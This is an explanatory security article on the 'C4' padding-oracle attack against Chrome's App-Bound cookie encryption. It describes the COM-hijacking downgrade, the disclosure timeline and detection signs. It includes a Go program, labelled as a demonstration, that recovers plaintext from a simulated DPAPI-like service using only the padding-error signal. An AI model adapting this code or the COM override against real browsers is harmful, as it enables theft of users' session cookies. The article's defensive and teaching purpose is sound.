In July 2024, Google introduced App-Bound Encryption for cookies in Chrome to protect user data against infostealer malware. The mechanism wraps the key that encrypts cookies in two layers of the Windows Data Protection API (DPAPI): the key is first encrypted with the user's DPAPI key and then re-encrypted with the SYSTEM DPAPI key by a Chrome elevation service that runs as SYSTEM. In theory this limits removal of the outer layer to SYSTEM-level processes, so a stealer running as the user cannot read the cookies even though it can read the cookie database.
However, researchers have identified a critical weakness, which they call the C4 (Chrome Cookie Cipher Cracker) attack, that undermines this protection. C4 exploits a padding oracle in the elevation service, a Component Object Model (COM) server running with SYSTEM privileges that handles the decryption requests. By observing the error messages the service produces when it is fed tampered ciphertext, an attacker can strip the outer SYSTEM-DPAPI layer one byte at a time without holding elevated privileges.
Mechanism of the C4 Attack:
The C4 attack relies on DPAPI's use of AES in CBC mode with PKCS7 padding. When the elevation service processes tampered ciphertext, Windows logs one of two distinct error events, visible in Event Viewer and readable from the attacker's unprivileged context:
– "Unknown error" when the padding is invalid.
– "MAC check failed" when the padding is valid but the integrity check does not match.
Because the two outcomes are distinguishable, the service acts as a padding oracle: the attacker modifies the preceding ciphertext block byte by byte, submits it, and reads the resulting event to learn whether the padding check passed. Each plaintext byte takes up to 256 guesses, so the full recovery is a long run of inter-process communication (IPC) requests to the elevation service paired with Windows Event Log reads; the researchers report that it takes roughly 16 hours.
Once the outer layer is stripped, what remains is the User-DPAPI-encrypted key, which any process running as that user can decrypt with an ordinary CryptUnprotectData call. With the key in hand, the cookies themselves can be decrypted, which defeats the restriction App-Bound Encryption was meant to enforce.
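The following Go program is an added example, not code from the C4 researchers or from Chrome, that shows the padding-oracle mechanism described above in self-contained form. It models the SYSTEM-DPAPI layer with an assumed construction (AES-256-CBC with PKCS7 padding plus an HMAC-SHA512 tag) in which the service checks padding before the tag, so the two failures are distinguishable, which is exactly the ordering the attack needs; DPAPI's real blob format is not reproduced. The keys, the secret and the function names (`protect`, `unprotect`, `paddingOracleDecrypt`, `runDemo`) are constructed for the demo. The attacker side never touches a key: per query it learns only whether the padding check passed (the "Unknown error" versus "MAC check failed" distinction), and it recovers the plaintext block by block, including the usual check that guards against an accidental longer padding on the last byte.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha512"
	"errors"
	"fmt"
)

// The two distinguishable outcomes the page describes; telling them apart is the whole oracle.
var ErrPadding = errors.New("Unknown error") // invalid PKCS7 padding
var ErrMAC = errors.New("MAC check failed")  // padding ok, tag wrong

// protect is an assumed stand-in for the SYSTEM-DPAPI layer (not DPAPI's real blob format):
// AES-256-CBC with PKCS7 padding, IV prepended, HMAC-SHA512 of the plaintext appended.
func protect(encKey, macKey, plaintext []byte) []byte {
	pad := aes.BlockSize - len(plaintext)%aes.BlockSize
	body := append(append([]byte{}, plaintext...), bytes.Repeat([]byte{byte(pad)}, pad)...)
	block, _ := aes.NewCipher(encKey)               // 32-byte key: cannot fail
	iv := bytes.Repeat([]byte{0x42}, aes.BlockSize) // fixed IV: demo only
	ct := make([]byte, len(body))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, body)
	mac := hmac.New(sha512.New, macKey)
	mac.Write(plaintext)
	return append(append(iv, ct...), mac.Sum(nil)...)
}

// unprotect plays the elevation service: decrypt, check padding FIRST, verify the tag second.
func unprotect(encKey, macKey, blob []byte) ([]byte, error) {
	block, _ := aes.NewCipher(encKey)
	n := len(blob) - sha512.Size
	iv, ct, tag := blob[:aes.BlockSize], blob[aes.BlockSize:n], blob[n:]
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	pad := int(pt[len(pt)-1])
	if pad == 0 || pad > aes.BlockSize || !bytes.Equal(pt[len(pt)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return nil, ErrPadding
	}
	pt = pt[:len(pt)-pad]
	mac := hmac.New(sha512.New, macKey)
	mac.Write(pt)
	if !hmac.Equal(tag, mac.Sum(nil)) {
		return nil, ErrMAC
	}
	return pt, nil
}

// paddingOracleDecrypt recovers the padded plaintext of blob (IV||ciphertext||tag) with no key,
// block by block and byte by byte from the end; it returns the bytes and the number of queries.
func paddingOracleDecrypt(oracle func([]byte) bool, blob []byte) ([]byte, int) {
	bs, queries := aes.BlockSize, 0
	var out []byte
	for b := bs; b+bs <= len(blob)-sha512.Size; b += bs {
		prev, cur := blob[b-bs:b], blob[b:b+bs]
		inter := make([]byte, bs)               // D_k(cur): the state before the CBC XOR
		probe := make([]byte, 2*bs+sha512.Size) // crafted "IV" || cur || junk tag
		copy(probe[bs:], cur)
		for pos := bs - 1; pos >= 0; pos-- {
			pad := byte(bs - pos)
			for j := pos + 1; j < bs; j++ {
				probe[j] = inter[j] ^ pad // force the already-recovered tail to the target padding
			}
			for g := 0; g < 256; g++ {
				probe[pos] = byte(g)
				queries++
				hit := oracle(probe)
				if hit && pos == bs-1 { // may be a chance 0x02 0x02: disturb byte 14 and re-ask
					probe[pos-1] ^= 0xff
					hit = oracle(probe)
					probe[pos-1] ^= 0xff
					queries++
				}
				if hit {
					inter[pos] = byte(g) ^ pad
					break
				}
			}
		}
		for i := range inter {
			out = append(out, inter[i]^prev[i]) // P_i = D_k(C_i) XOR C_{i-1}
		}
	}
	return out, queries
}

// runDemo wraps a constructed secret and recovers it using nothing but the oracle bit.
func runDemo() (recovered, secret []byte, queries int) {
	encKey, macKey := bytes.Repeat([]byte{0x11}, 32), bytes.Repeat([]byte{0x22}, 32) // never seen by the attacker
	secret = []byte("app-bound-key:0123456789abcdef") // constructed stand-in for the inner User-DPAPI blob
	blob := protect(encKey, macKey, secret)
	oracle := func(b []byte) bool {
		_, err := unprotect(encKey, macKey, b)
		return !errors.Is(err, ErrPadding) // "MAC check failed" or success both mean the padding was valid
	}
	pt, n := paddingOracleDecrypt(oracle, blob)
	return pt[:len(secret)], secret, n
}

func main() {
	rec, sec, n := runDemo()
	fmt.Printf("recovered %q (match=%v) after %d oracle queries\n", rec, bytes.Equal(rec, sec), n)
}
```

Run it with `go run`. The query count it prints is the number to multiply by the per-query cost (one IPC round trip to the service plus an Event Log read) when estimating wall-clock time; every recovered byte costs up to 256 queries, and the last byte of each block costs one extra confirmation query. Note that the attacker code only ever edits the block that precedes the target block, which is why stripping the outer layer needs no key material at all.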
Alternative Exploitation Method:
The researchers also found a simpler route that uses COM hijacking. By registering a per-user COM override for the elevation service's class that points at a binary that does not exist, an attacker can make Chrome fail to reach the service and fall back to the legacy, user-DPAPI-only encryption. This needs far less skill, but Chrome re-keys in the process, so cookies encrypted under the old key are lost along with the victim's existing sessions, which is noisy and presents the attacker with a different set of problems.
Response and Mitigation Efforts:
The vulnerability was responsibly disclosed to Google in December 2024. In February 2025 Google acknowledged the report and accepted it. As of June 23, 2025, a partial fix had shipped in Chrome, but it is disabled by default; a complete fix is planned for a future release.
Microsoft, for its part, declined to change the underlying DPAPI behaviour, stating that the issue does not meet its bar for a security fix because of its low practical exploitability.
Implications and Recommendations:
The C4 attack illustrates how combining legacy mechanisms in new ways can introduce new weaknesses: DPAPI's CBC-with-padding construction and its error reporting were never designed to sit behind a privilege boundary that an unprivileged caller can probe thousands of times. Users should keep their browsers updated and watch official channels for patches. Organizations should consider additional controls such as endpoint detection and response (EDR); the attack's footprint is distinctive, since the oracle variant produces a sustained stream of DPAPI decryption failures logged against the elevation service over many hours, and the COM-hijacking variant requires a per-user COM registration change that points Chrome's elevation service at a missing binary.
As the digital landscape continues to evolve, it is imperative for both developers and users to remain proactive in identifying and addressing security vulnerabilities to maintain the integrity and confidentiality of sensitive information.